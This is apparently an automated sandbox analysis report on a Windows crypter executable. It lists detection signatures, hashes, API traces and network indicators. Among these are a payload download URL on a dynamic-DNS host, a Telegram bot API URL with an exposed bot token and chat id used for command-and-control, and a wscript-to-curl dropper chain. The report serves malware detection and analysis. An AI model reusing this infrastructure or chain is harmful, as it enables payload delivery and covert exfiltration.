Windows Analysis Report
SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe
Analysis ID: 1416945
MD5: e31217888b467821745770b0f9565f66
SHA1: a6b7f7f96f02c2e78f6d35570948f29ee89665d9
SHA256: 664cf9b9a6c02eb803043cae1e2097d9fd1fa5c7fed6def439a969d6d5ea260b
Tags: exe
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Potential malicious VBS script found (suspicious strings)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exew Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe.dlll: Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exel Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: puredgb.duckdns.org Virustotal: Detection: 8% Perma Link
Source: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Virustotal: Detection: 27% Perma Link
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3294244 CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,wcslen, 0_2_00007FF7B3294244
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327E6A4 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 0_2_00007FF7B327E6A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327F970 memset,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 0_2_00007FF7B327F970
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327F0EC memset,_strdup,fopen,free,fseek,ftell,fread,fclose,free,fseek,malloc,strlen,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free, 0_2_00007FF7B327F0EC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3299E70 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 0_2_00007FF7B3299E70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3299E60 CryptHashData, 0_2_00007FF7B3299E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3293D58 strlen,strlen,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, 0_2_00007FF7B3293D58
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3299E14 CryptAcquireContextA,CryptCreateHash, 0_2_00007FF7B3299E14
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: -----BEGIN PUBLIC KEY----- 0_2_00007FF7B326CD8C
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49710 version: TLS 1.2
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: tmp.vbs, 00000004.00000000.1510729864.00007FF7B0AF8000.00000002.00000001.01000000.00000004.sdmp, tmp.vbs, 00000004.00000003.1512748177.00000263F2900000.00000004.00000020.00020000.00000000.sdmp, tmp.vbs, 00000004.00000002.1533810636.00007FF7B0AF8000.00000002.00000001.01000000.00000004.sdmp, tmp.vbs, 00000004.00000003.1512346232.00000263F2009000.00000004.00000020.00020000.00000000.sdmp, tmp.vbs.0.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329A438 FindClose,abort,FindFirstFileExW,GetLastError, 0_2_00007FF7B329A438
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329A4AC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort, 0_2_00007FF7B329A4AC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ADADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7B0ADADF0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AC40CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7B0AC40CC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AEF900 FindFirstFileExA, 4_2_00007FF7B0AEF900

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\curl.exe

Networking
barindex
Uses dynamic DNS services
Source: unknown DNS query: name: puredgb.duckdns.org
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49707
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.9:49707 -> 200.165.100.3:30000
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TelemarNorteLesteSABR TelemarNorteLesteSABR
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327A5D8 recv,WSAGetLastError, 0_2_00007FF7B327A5D8
Source: global traffic HTTP traffic detected: GET /bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success HTTP/1.1Host: api.telegram.orgUser-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /xmg8oxqt/ping.exe HTTP/1.1Host: puredgb.duckdns.org:30000User-Agent: curl/7.79.1Accept: */*
Source: unknown DNS traffic detected: queries for: puredgb.duckdns.org
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: http://decimate.online
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: http://decimate.onlinehey
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe, 00000000.00000002.1511313946.0000017017F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe, 00000000.00000002.1511313946.0000017017F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe.dlll:
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe, 00000000.00000002.1511313946.0000017017F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exel
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe, 00000000.00000002.1511313946.0000017017F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exew
Source: curl.exe, 00000008.00000002.1533438725.000001FB15808000.00000004.00000020.00020000.00000000.sdmp, tmp.vbs.0.dr, ping.bat.4.dr String found in binary or memory: https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=69151
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: https://curl.se/docs/hsts.html
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: https://ibb.co/pjHVbzL).
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49710 version: TLS 1.2

System Summary
barindex
Potential malicious VBS script found (suspicious strings)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Dropped file: 2pK[\ r\H8xHH8H8X8@8H8h H`x8bdh(ee`(eHe e( XeXX`ePh.8tXVBj 4R@.f$:\jxxl\L>2*xfXL2n^L>0F xSendMessageWShowWindow)GetDlgItemSetDlgItemTextWEnableWindowSetWindowTextWGetWindowTextWGetWindowTextLengthWfGetParentSetWindowPosGetSystemMetricsGetClientRectGetWindowRectGetWindowLongWSetWindowLongWGetWindowLongPtrWSetProcessDefaultLayoutGetWindowLoadStringW&OemToCharBuffA<CharUpperWDefWindowProcWQRegisterClassExWnCreateWindowExWIsWindowDestroyWindowUpdateWindowMapWindowPointsUCopyRectSetWindowLongPtrWLoadCursorW#GetDCiReleaseDCMessageBoxWFindWindowExWGetClassNameWTCopyImage_GetMessageWTranslateMessageDispatchMessageW7PeekMessageW:PostMessageW.WaitForInputIdleIsWindowVisibleDialogBoxParamWEndDialog,GetDlgItemTextWwSendDlgItemMessageWSetFocusSetForegroundWindow}GetSysColorLoadBitmapWLoadIconWDestroyIconIsDialogMessageW/CreateCompatibleBitmap0CreateCompatibleDCDeleteDCDeleteObjectGetDeviceCapswSelectObjectStretchBlt5CreateDIBSectionGetObjectWG Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Dropped file: "6Hbx:Pfp|NB`t6JLocalFreeGetLastErrorSetLastErrordFormatMessageWGetCurrentProcessDeviceIoControlxSetFileTimeRCloseHandleRemoveDirectoryWCreateFileWDeleteFileWCreateHardLinkWhGetShortPathNameWGetLongPathNameWeMoveFileWGetFileTypekGetStdHandle4WriteFileReadFile]FlushFileBuffersaSetEndOfFiletSetFilePointerGetCurrentProcessIdCreateDirectoryWoSetFileAttributesWGetFileAttributesW4FindClose?FindFirstFileWKFindNextFileWGetVersionExWGetModuleFileNameW[SetCurrentDirectoryWGetCurrentDirectoryWGetFullPathNameWbFoldStringWGetModuleHandleWTFindResourceWhFreeLibraryLGetProcAddress#ExpandEnvironmentStringsWExitProcessSetThreadExecutionStateSleepALoadLibraryWwGetSystemDirectoryWdCompareStringWAllocConsoleeFreeConsoleAttachConsole3WriteConsoleWMGetProcessAffinityMaskCreateThreadSetThreadPriorityInitializeCriticalSectionEnterCriticalSection;LeaveCriticalSectionDeleteCriticalSectiongSetEventResetEventReleaseSemaphoreWaitForSingleObjectCreateEventWCreateSemaphoreW~GetSystemTimeSystemTimeToTzSpecificLocalTimeTzSpecificLocalTimeToSystemTimeSystemTimeToFileTime*FileTimeToLocalFileTimeHLocalFileTimeToFileTime+FileTimeToSystemTimexGetCPInfoIsDBCSLeadByteiMultiByteToWideChar WideCharToMultiByteGlobalAllocVLockResourceGlobalLockGlobalUnlockGlobalFreeGlobalMemoryStatusExCLoadResourceSizeofResourceGetTimeFormatWGetDateFormatWGetExitCodeProcessGetLocalTimeGetTickCountYMapViewOfFileUnmapViewOfFileCreateFileMappingW{OpenFileMappingWGetCommandLineWeSetEnvironmentVariableWGetTempPathWbMoveFileExWGetLocaleInfoW:GetNumberFormatWKERNEL32.dllOLEAUT32.dll!GdipAllocGdipFree6GdipCloneImageGdipDisposeImageQGdipCreateBitmapFromStream_GdipCreateHBITMAPFromBitmapuGdiplusStartuptGdiplusShutdowngdiplus.dllRaiseExceptionzGetSystemInfoVirtualProtectVirtualQuery?LoadLibraryExARtlCaptureContextRtlLookupFunctionEntry&RtlVirtualUnwindUnhandledExceptionFilterSetUnhandledExceptionFilterTerminateProcessIsProcessorFeaturePresentInitializeCriticalSectionAndSpinCountWaitForSingleObjectExIsDebuggerPresentjGetStartupInfoWQueryPerformanceCounterGetCurrentThreadIdGetSystemTimeAsFileTimeInitializeSListHead!RtlPcToFileHeader%RtlUnwindExEncodePointerTlsAllocTlsGetValueTlsSetValueTlsFree@LoadLibraryExWQueryPerformanceFrequencyGetModuleHandleExWGetModuleFileNameAnGetACPHeapFreeHeapAllocpGetStri Jump to dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ABC308: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7B0ABC308
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B32328A8 0_2_00007FF7B32328A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3276BEC 0_2_00007FF7B3276BEC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3235AE8 0_2_00007FF7B3235AE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327796C 0_2_00007FF7B327796C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3245F20 0_2_00007FF7B3245F20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3249EAC 0_2_00007FF7B3249EAC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329043C 0_2_00007FF7B329043C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3241494 0_2_00007FF7B3241494
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329A4AC 0_2_00007FF7B329A4AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3260358 0_2_00007FF7B3260358
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B32403A4 0_2_00007FF7B32403A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B32643D8 0_2_00007FF7B32643D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3280280 0_2_00007FF7B3280280
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B32632E0 0_2_00007FF7B32632E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B326D174 0_2_00007FF7B326D174
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3272890 0_2_00007FF7B3272890
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3293878 0_2_00007FF7B3293878
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B328C85C 0_2_00007FF7B328C85C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B32888CC 0_2_00007FF7B32888CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B32538BC 0_2_00007FF7B32538BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B322A8F8 0_2_00007FF7B322A8F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327D644 0_2_00007FF7B327D644
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B323F694 0_2_00007FF7B323F694
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B325366C 0_2_00007FF7B325366C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3264658 0_2_00007FF7B3264658
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3263698 0_2_00007FF7B3263698
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3237594 0_2_00007FF7B3237594
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3265C48 0_2_00007FF7B3265C48
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329BC4A 0_2_00007FF7B329BC4A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3280C80 0_2_00007FF7B3280C80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3279D0C 0_2_00007FF7B3279D0C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B324AB5C 0_2_00007FF7B324AB5C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3298BB8 0_2_00007FF7B3298BB8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3251BC4 0_2_00007FF7B3251BC4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3263BB0 0_2_00007FF7B3263BB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B324CB9C 0_2_00007FF7B324CB9C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B328EA70 0_2_00007FF7B328EA70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3223AD0 0_2_00007FF7B3223AD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B322BAD8 0_2_00007FF7B322BAD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B32850C4 0_2_00007FF7B32850C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327F0EC 0_2_00007FF7B327F0EC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B326EF34 0_2_00007FF7B326EF34
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3263F96 0_2_00007FF7B3263F96
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3266F74 0_2_00007FF7B3266F74
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3232E60 0_2_00007FF7B3232E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3260EAC 0_2_00007FF7B3260EAC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3255EF0 0_2_00007FF7B3255EF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B324BD24 0_2_00007FF7B324BD24
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3281D78 0_2_00007FF7B3281D78
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3263D80 0_2_00007FF7B3263D80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3253E00 0_2_00007FF7B3253E00
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ACA1CC 4_2_00007FF7B0ACA1CC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AE03B4 4_2_00007FF7B0AE03B4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ABF8F0 4_2_00007FF7B0ABF8F0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ADCAE8 4_2_00007FF7B0ADCAE8
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ADADF0 4_2_00007FF7B0ADADF0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AB5E30 4_2_00007FF7B0AB5E30
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AC11D4 4_2_00007FF7B0AC11D4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AF21B0 4_2_00007FF7B0AF21B0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ABC308 4_2_00007FF7B0ABC308
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ABA304 4_2_00007FF7B0ABA304
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ACB250 4_2_00007FF7B0ACB250
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AB7288 4_2_00007FF7B0AB7288
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AEC498 4_2_00007FF7B0AEC498
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD35C4 4_2_00007FF7B0AD35C4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AE8600 4_2_00007FF7B0AE8600
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AB76C0 4_2_00007FF7B0AB76C0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD2710 4_2_00007FF7B0AD2710
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AEF6F4 4_2_00007FF7B0AEF6F4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ACC688 4_2_00007FF7B0ACC688
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ABA66C 4_2_00007FF7B0ABA66C
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD47F8 4_2_00007FF7B0AD47F8
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AF5758 4_2_00007FF7B0AF5758
